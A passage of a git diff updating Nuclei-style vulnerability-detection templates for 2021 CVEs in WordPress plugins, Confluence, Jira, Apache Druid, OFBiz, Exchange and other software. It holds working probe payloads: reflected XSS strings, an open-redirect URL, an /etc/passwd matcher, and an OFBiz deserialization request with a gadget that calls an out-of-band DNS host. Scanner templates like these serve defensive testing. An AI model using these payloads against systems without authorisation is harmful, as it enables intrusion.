-      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com"
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2021/CVE-2021-25112.yaml b/cves/2021/CVE-2021-25112.yaml
index 954f7c3c83..cbc99f4b6b 100644
--- a/cves/2021/CVE-2021-25112.yaml
+++ b/cves/2021/CVE-2021-25112.yaml
@@ -1,19 +1,21 @@
 id: CVE-2021-25112
 
 info:
-  name: WordPress WHMCS Bridge < 6.4b -  Cross-Site Scripting
-  author: DhiyaneshDK
+  name: WordPress WHMCS Bridge <6.4b - Cross-Site Scripting
+  author: dhiyaneshDk
   severity: medium
-  description: WordPress WHMCS Bridge < 6.4b is susceptible to authenticated reflected cross-site scripting because the plugin does not sanitize and escape the error parameter before outputting it back in admin dashboard.
+  description: |
+    WordPress WHMCS Bridge plugin before 6.4b contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the error parameter before outputting it back in the admin dashboard.
   reference:
     - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112
+    - https://plugins.trac.wordpress.org/changeset/2659751
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25112
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-25112
     cwe-id: CWE-79
-  tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated
+  tags: whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated
 
 requests:
   - raw:
@@ -36,7 +38,7 @@ requests:
       - type: word
         part: body
         words:
-          - "<img src onerror=alert(document.domain)>"
+          - "<strong><img src onerror=alert(document.domain)></strong>"
 
       - type: word
         part: header
@@ -47,4 +49,4 @@ requests:
         status:
           - 200
 
-# Enhanced by mp on 2022/04/21
+# Enhanced by md on 2022/09/08
diff --git a/cves/2021/CVE-2021-25118.yaml b/cves/2021/CVE-2021-25118.yaml
index e9bd5f3d07..b82074a3bf 100644
--- a/cves/2021/CVE-2021-25118.yaml
+++ b/cves/2021/CVE-2021-25118.yaml
@@ -5,16 +5,17 @@ info:
   author: DhiyaneshDK
   severity: medium
   description: The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.
-  remediation: Fixed in version 17.3
   reference:
     - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550
     - https://nvd.nist.gov/vuln/detail/CVE-2021-25118
-  tags: wordpress,cve2021,wp-plugin,fpd,cve,wp
+    - https://plugins.trac.wordpress.org/changeset/2608691
+  remediation: Fixed in version 17.3
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
-    cvss-score: 5.30
+    cvss-score: 5.3
     cve-id: CVE-2021-25118
     cwe-id: CWE-200
+  tags: wpscan,wordpress,cve2021,wp-plugin,fpd,cve,wp
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-25120.yaml b/cves/2021/CVE-2021-25120.yaml
index cb54be71ed..28aa3f7856 100644
--- a/cves/2021/CVE-2021-25120.yaml
+++ b/cves/2021/CVE-2021-25120.yaml
@@ -4,14 +4,17 @@ info:
   name: Easy Social Feed < 6.2.7 - Cross-Site Scripting
   author: dhiyaneshDk
   severity: medium
-  description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to
-    it being executed in the context of a logged admin or editor.
+  description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor.
   reference:
     - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0
-    - https://www.cvedetails.com/cve/CVE-2021-25120/
+    - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25120
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
     cve-id: CVE-2021-25120
-  tags: wordpress,wp-plugin,xss,authenticated
+    cwe-id: CWE-79
+  tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-25281.yaml b/cves/2021/CVE-2021-25281.yaml
index 3a896fdda0..8a2c51684d 100644
--- a/cves/2021/CVE-2021-25281.yaml
+++ b/cves/2021/CVE-2021-25281.yaml
@@ -1,13 +1,16 @@
 id: CVE-2021-25281
 
 info:
-  name: SaltStack wheel_async unauth access
+  name: SaltStack Salt <3002.5 - Auth Bypass
   author: madrobot
   severity: critical
-  description: The SaltAPI does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master.
+  description: SaltStack Salt before 3002.5 does not honor eauth credentials for the wheel_async client, allowing attackers to remotely run any wheel modules on the master.
   reference:
     - http://hackdig.com/02/hack-283902.htm
     - https://dozer.nz/posts/saltapi-vulns
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25281
+    - https://github.com/saltstack/salt/releases
+    - https://www.saltstack.com/blog/active-saltstack-cve-announced-2021-jan-21/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -39,3 +42,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/17
diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml
index 42113112c4..0088d91273 100644
--- a/cves/2021/CVE-2021-25646.yaml
+++ b/cves/2021/CVE-2021-25646.yaml
@@ -1,14 +1,17 @@
 id: CVE-2021-25646
 
 info:
-  name: Apache Druid RCE
+  name: Apache Druid - Remote Code Execution
   author: pikpikcu
   severity: high
   description: |
-    Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
-    Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
+    Apache Druid is susceptible to remote code execution because by default it lacks authorization and authentication. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
   reference:
     - https://paper.seebug.org/1476/
+    - https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E
+    - http://www.openwall.com/lists/oss-security/2021/01/29/6
+    - https://lists.apache.org/thread.html/r64431c2b97209f566b5dff92415e7afba0ed3bfab4695ebaa8a62e5d@%3Cdev.druid.apache.org%3E
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25864
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
@@ -60,22 +63,25 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        words:
-          - "application/json"
-        part: header
+
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
 
       - type: word
+        part: body
         words:
           - "numRowsRead"
           - "numRowsIndexed"
-        part: body
         condition: and
 
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-        part: body
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2021/CVE-2021-25864.yaml b/cves/2021/CVE-2021-25864.yaml
index ef5001e046..3784e9881b 100644
--- a/cves/2021/CVE-2021-25864.yaml
+++ b/cves/2021/CVE-2021-25864.yaml
@@ -1,13 +1,13 @@
 id: CVE-2021-25864
 
 info:
-  name: Hue Magic - Directory Traversal
+  name: Hue Magic 3.0.0 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.
+  description: Hue Magic 3.0.0 is susceptible to local file inclusion via the res.sendFile API.
   reference:
     - https://github.com/Foddy/node-red-contrib-huemagic/issues/217
-    - https://www.cvedetails.com/cve/CVE-2021-25864
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25864
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -32,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/27
diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml
index 961844bbd9..35956daca0 100644
--- a/cves/2021/CVE-2021-26084.yaml
+++ b/cves/2021/CVE-2021-26084.yaml
@@ -1,13 +1,10 @@
 id: CVE-2021-26084
 
 info:
-  name: Confluence Server OGNL injection - RCE
+  name: Confluence Server - Remote Code Execution
   author: dhiyaneshDk,philippedelteil
   severity: critical
-  description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary
-    code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled.
-    To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from
-    version 7.12.0 before 7.12.5.
+  description: Confluence Server and Data Center contain an OGNL injection vulnerability that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from  version 7.12.0 before 7.12.5. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options.
   reference:
     - https://jira.atlassian.com/browse/CONFSERVER-67940
     - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084
@@ -20,7 +17,7 @@ info:
     cwe-id: CWE-74
   metadata:
     shodan-query: http.component:"Atlassian Confluence"
-  tags: cve,cve2021,rce,confluence,injection,ognl
+  tags: cve,cve2021,rce,confluence,injection,ognl,kev
 
 requests:
   - raw:
@@ -58,3 +55,5 @@ requests:
         part: body
         words:
           - 'value="aaaa{140592=null}'
+
+# Enhanced by mp on 2022/05/17
diff --git a/cves/2021/CVE-2021-26085.yaml b/cves/2021/CVE-2021-26085.yaml
index f3230e2c4e..d0c5c959ec 100644
--- a/cves/2021/CVE-2021-26085.yaml
+++ b/cves/2021/CVE-2021-26085.yaml
@@ -1,12 +1,13 @@
 id: CVE-2021-26085
 
 info:
-  name: Confluence Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085
+  name: Atlassian Confluence Server - Local File Inclusion
   author: princechaddha
   severity: medium
-  description: Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint.
+  description: Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint.
   reference:
     - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
+    - https://jira.atlassian.com/browse/CONFSERVER-67893
     - https://nvd.nist.gov/vuln/detail/CVE-2021-26085
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
@@ -15,7 +16,7 @@ info:
     cwe-id: CWE-862
   metadata:
     shodan-query: http.component:"Atlassian Confluence"
-  tags: cve,cve2021,confluence,atlassian,lfi
+  tags: kev,packetstorm,cve,cve2021,confluence,atlassian,lfi
 
 requests:
   - method: GET
@@ -34,3 +35,5 @@ requests:
           - "<display-name>Confluence</display-name>"
           - "com.atlassian.confluence.setup.ConfluenceAppConfig"
         condition: and
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2021/CVE-2021-26086.yaml b/cves/2021/CVE-2021-26086.yaml
index 3e5c63b666..3eba4131e7 100644
--- a/cves/2021/CVE-2021-26086.yaml
+++ b/cves/2021/CVE-2021-26086.yaml
@@ -1,19 +1,22 @@
 id: CVE-2021-26086
 
 info:
-  name: Jira Limited Local File Read
+  name: Atlassian Jira Limited -  Local File Inclusion
   author: cocxanh
   severity: medium
-  description: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
+  description: Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
   reference:
     - https://jira.atlassian.com/browse/JRASERVER-72695
+    - http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html
     - https://nvd.nist.gov/vuln/detail/CVE-2021-26086
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2021-26086
     cwe-id: CWE-22
-  tags: cve,cve2021,jira,lfi
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
+  tags: lfi,packetstorm,cve,cve2021,jira
 
 requests:
   - method: GET
@@ -32,3 +35,5 @@ requests:
           - "</web-app>"
         part: body
         condition: and
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2021/CVE-2021-26247.yaml b/cves/2021/CVE-2021-26247.yaml
index 8e93d4efdf..90ad608a46 100644
--- a/cves/2021/CVE-2021-26247.yaml
+++ b/cves/2021/CVE-2021-26247.yaml
@@ -1,11 +1,12 @@
 id: CVE-2021-26247
 
 info:
-  name: Unauthenticated XSS Cacti - auth_changepassword.php
+  name: Cacti - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
-  description: As an unauthenticated remote user, visit "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" to successfully execute the JavaScript payload present in the "ref" URL parameter.
+  description: Cacti contains a cross-site scripting vulnerability via "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" which can successfully execute the JavaScript payload present in the "ref" URL parameter.
   reference:
+    - https://www.cacti.net/info/changelog
     - https://nvd.nist.gov/vuln/detail/CVE-2021-26247
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml
index aa20e3cce4..5fb08129dd 100644
--- a/cves/2021/CVE-2021-26295.yaml
+++ b/cves/2021/CVE-2021-26295.yaml
@@ -1,22 +1,28 @@
 id: CVE-2021-26295
 
 info:
-  name: Apache OFBiz RMI deserializes Arbitrary Code Execution
+  name: Apache OFBiz <17.12.06 - Arbitrary Code Execution
   author: madrobot
   severity: critical
-  description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.
+  description: |
+    Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.
   reference:
     - https://github.com/yumusb/CVE-2021-26295-POC
+    - https://packetstormsecurity.com/files/162104/Apache-OFBiz-SOAP-Java-Deserialization.html
+    - https://github.com/zhzyker/exphub/tree/master/ofbiz
     - https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E
     - https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-26295
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-26295
     cwe-id: CWE-502
   metadata:
-    ysoserial-payload: java -jar ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn | hex
-  tags: apache,cve,cve2021,rce,ofbiz
+    shodan-query: OFBiz.Visitor=
+    verified: "true"
+    ysoserial-payload: java -jar ysoserial.jar URLDNS https://oob-url-to-request.tld | hex
+  tags: packetstorm,cve,cve2021,apache,ofbiz,deserialization,rce
 
 requests:
   - raw:
@@ -25,39 +31,33 @@ requests:
         Host: {{Hostname}}
         Content-Type: application/xml
 
+        <?xml version='1.0' encoding='UTF-8'?>
         <soapenv:Envelope
-            xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
-            <soapenv:Header/>
+          xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+          <soapenv:Header/>
             <soapenv:Body>
-                <ser>
-                    <map-HashMap>
-                        <map-Entry>
-                            <map-Key>
-                                <cus-obj>bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a</cus-obj>
-                            </map-Key>
-                            <map-Value>
-                                <std-String value="http://t53lq9.dnslog.cn/"></std-String>
-                            </map-Value>
-                        </map-Entry>
-                    </map-HashMap>
-                </ser>
+              <ns1:clearAllEntityCaches xmlns:ns1="http://ofbiz.apache.org/service/">
+                  <ns1:cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</ns1:cus-obj>
+              </ns1:clearAllEntityCaches>
             </soapenv:Body>
         </soapenv:Envelope>
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
 
       - type: word
+        part: body
+        words:
+          - "errorMessage"
+        condition: and
+
+      - type: word
+        part: header
         words:
           - "OFBiz.Visitor="
-        part: header
 
-      - type: word
-        words:
-          - "deserializing"
-          - "errorMessage"
-        part: body
-        condition: and
+# Enhanced by mp on 2022/05/17
diff --git a/cves/2021/CVE-2021-26475.yaml b/cves/2021/CVE-2021-26475.yaml
index 82def2e347..9a3b05f436 100644
--- a/cves/2021/CVE-2021-26475.yaml
+++ b/cves/2021/CVE-2021-26475.yaml
@@ -1,12 +1,14 @@
 id: CVE-2021-26475
 
 info:
-  name: EPrints 3.4.2 XSS
+  name: EPrints 3.4.2 - Cross-Site Scripting
   author: geeknik
   severity: medium
-  description: EPrints 3.4.2 exposes a reflected XSS opportunity in the via a cgi/cal URI.
+  description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability via the cgi/cal URI.
   reference:
     - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
+    - https://files.eprints.org/2548/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-26475
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -24,7 +26,14 @@ requests:
       - type: word
         words:
           - "</title><script>alert('{{randstr}}')</script>"
+
       - type: word
         part: header
         words:
           - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-26598.yaml b/cves/2021/CVE-2021-26598.yaml
index 148674a260..53e5abe4a3 100644
--- a/cves/2021/CVE-2021-26598.yaml
+++ b/cves/2021/CVE-2021-26598.yaml
@@ -17,7 +17,7 @@ info:
     cwe-id: CWE-287
   metadata:
     shodan-query: http.html:"ImpressCMS"
-  tags: cve,cve2021,impresscms,unauth,cms
+  tags: hackerone,cve,cve2021,impresscms,unauth,cms
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-26702.yaml b/cves/2021/CVE-2021-26702.yaml
new file mode 100644
index 0000000000..a543bb5aa1
--- /dev/null
+++ b/cves/2021/CVE-2021-26702.yaml
@@ -0,0 +1,39 @@
+id: CVE-2021-26702
+
+info:
+  name: EPrints 3.4.2 - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI.
+  reference:
+    - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
+    - https://files.eprints.org/2548/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-26702
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-26702
+    cwe-id: CWE-79
+  tags: cve,cve2021,xss,eprints
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-26710.yaml b/cves/2021/CVE-2021-26710.yaml
index 45326f7452..e1c9346116 100644
--- a/cves/2021/CVE-2021-26710.yaml
+++ b/cves/2021/CVE-2021-26710.yaml
@@ -1,12 +1,14 @@
 id: CVE-2021-26710
 
 info:
-  name: Redwood v4.3.4.5-v4.5.3 XSS
+  name: Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: A cross-site scripting (XSS) issue in the login panel in Redwood Report2Web 4.3.4.5 and 4.5.3 allows remote attackers to inject JavaScript via the signIn.do urll parameter.
+  description: Redwood Report2Web 4.3.4.5 and 4.5.3 contains a cross-site scripting vulnerability in the login panel which allows remote attackers to inject JavaScript via the signIn.do urll parameter.
   reference:
     - https://vict0ni.me/report2web-xss-frame-injection.html
+    - https://vict0ni.me/redwood-report2web-xss-and-frame-injection/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-26710
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -34,3 +36,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-26722.yaml b/cves/2021/CVE-2021-26722.yaml
deleted file mode 100644
index f338320939..0000000000
--- a/cves/2021/CVE-2021-26722.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: CVE-2021-26722
-
-info:
-  name: LinkedIn Oncall 1.4.0 XSS
-  author: pikpikcu
-  severity: medium
-  description: LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the "No results found for" message in the search bar.
-  reference:
-    - https://github.com/linkedin/oncall/issues/341
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.1
-    cve-id: CVE-2021-26722
-    cwe-id: CWE-79
-  tags: cve,cve2021,linkedin,xss
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        words:
-          - "<img src=x onerror=alert(document.domain)>"
-        part: body
-
-      - type: word
-        words:
-          - "text/html"
-        part: header
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-26723.yaml b/cves/2021/CVE-2021-26723.yaml
index 4b4c3b7a8e..33fa476b73 100644
--- a/cves/2021/CVE-2021-26723.yaml
+++ b/cves/2021/CVE-2021-26723.yaml
@@ -1,21 +1,22 @@
 id: CVE-2021-26723
 
 info:
-  name: Jenzabar v9.20-v9.2.2 XSS
+  name: Jenzabar 9.2x-9.2.2 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: Jenzabar 9.2.x through 9.2.2 allows /ics?tool=search&query= XSS.
+  description: Jenzabar 9.2.x through 9.2.2 contains a cross-site scripting vulnerability. It allows /ics?tool=search&query.
   reference:
     - http://packetstormsecurity.com/files/161303/Jenzabar-9.2.2-Cross-Site-Scripting.html
     - https://gist.github.com/Y0ung-DST/d1b6b65be6248b0ffc2b2f2120deb205
     - https://jenzabar.com/blog
     - https://y0ungdst.medium.com/xss-in-jenzabar-cve-2021-26723-a0749231328
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-26723
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-26723
     cwe-id: CWE-79
-  tags: cve,cve2021,jenzabar,xss
+  tags: packetstorm,cve,cve2021,jenzabar,xss
 
 requests:
   - method: GET
@@ -36,4 +37,6 @@ requests:
       - type: word
         words:
           - "text/html"
-        part: header
\ No newline at end of file
+        part: header
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-26812.yaml b/cves/2021/CVE-2021-26812.yaml
index e5378cec02..ddf8e9f797 100644
--- a/cves/2021/CVE-2021-26812.yaml
+++ b/cves/2021/CVE-2021-26812.yaml
@@ -1,11 +1,10 @@
 id: CVE-2021-26812
 
 info:
-  name: Moodle jitsi plugin XSS
+  name: Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting
   author: aceseven (digisec360)
   severity: medium
-  description: Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can
-    inject javascript code to be run by the application.
+  description: Moodle Jitsi Meet 2.7 through 2.8.3 plugin contains a cross-site scripting vulnerability via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject JavaScript code to be run by the application.
   reference:
     - https://github.com/udima-university/moodle-mod_jitsi/issues/67
     - https://nvd.nist.gov/vuln/detail/CVE-2021-26812
@@ -36,3 +35,5 @@ requests:
         part: header
         words:
           - "MoodleSession"
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml
index ef61e4ea50..a6bcde236c 100644
--- a/cves/2021/CVE-2021-26855.yaml
+++ b/cves/2021/CVE-2021-26855.yaml
@@ -4,21 +4,20 @@ info:
   name: Microsoft Exchange Server SSRF Vulnerability
   author: madrobot
   severity: critical
-  description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange
-    server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854,
-    CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
+  description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
   reference:
     - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
     - https://proxylogon.com/#timeline
-    - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
-    - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
+    - https://web.archive.org/web/20210306113850/https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
     - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
+  remediation: Apply the appropriate security update.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-26855
-  remediation: Apply the appropriate security update.
-  tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft
+  metadata:
+    shodan-query: vuln:CVE-2021-26855
+  tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft,kev
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-27132.yaml b/cves/2021/CVE-2021-27132.yaml
index d61addb02a..639239fcce 100644
--- a/cves/2021/CVE-2021-27132.yaml
+++ b/cves/2021/CVE-2021-27132.yaml
@@ -1,13 +1,14 @@
 id: CVE-2021-27132
 
 info:
-  name: CRLF Injection - Sercomm VD625
+  name: Sercomm VD625 Smart Modems - CRLF Injection
   author: geeknik
   severity: critical
